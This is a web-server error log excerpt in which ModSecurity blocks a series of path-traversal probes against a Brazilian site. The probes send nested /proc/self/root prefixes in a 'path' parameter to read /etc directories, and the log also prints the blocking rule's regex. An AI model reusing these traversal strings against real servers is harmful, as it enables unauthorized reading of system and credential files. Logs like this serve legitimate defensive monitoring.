"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPGHjZBu2q05ozVU9MYwAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:29.960639 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:40740] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPGXjZBu2q05ozVU9MaAAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:31.432532 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:45526] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPG3jZBu2q05ozVU9MawAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:33.796117 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.241.46:49960] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPHXjZBu2q05ozVU9McAAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:09:34.320009 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.243.203:45536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPHhXjF1vJNtV6CWrukQAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:36.083479 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:45548] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPII6lpbStxTqkSktkZQAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:37.588947 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:45556] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPIXjZBu2q05ozVU9MdAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:39.054898 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:45566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPI7ABkC4fWIHEf8HifAAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:40.475548 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.243.203:51498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPJAlT9VtDQc7bgUykXwAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:41.955411 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:51514] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPJQlT9VtDQc7bgUykYAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:43.470383 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.243.203:51526] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPJ_9ocpUE4ed4uDzkmwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:45.749961 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:51528] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPKdSswJuvopo3lOhWwgAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:47.422367 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.243.203:51532] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPKwlT9VtDQc7bgUykYQAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:48.636006 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.241.46:58574] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPLBXjF1vJNtV6CWruoAAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:48.731670 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.243.203:51546] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPLHjZBu2q05ozVU9MfQAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:49.996356 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.243.203:51560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPLXjZBu2q05ozVU9MgQAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:51.439942 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.243.203:49824] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPL3jZBu2q05ozVU9MhAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:52.755224 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.243.203:49832] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPMLysWC90G-1nBrA7bwAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:54.126448 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:49840] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPMnjZBu2q05ozVU9MiQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:55.403446 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:49852] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPM5qj1wV0Si-OkefhcAAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:56.758068 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:49868] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPNHbQATo66fKoS7xFHQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:09:58.041399 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:49870] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPNrysWC90G-1nBrA7cAAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
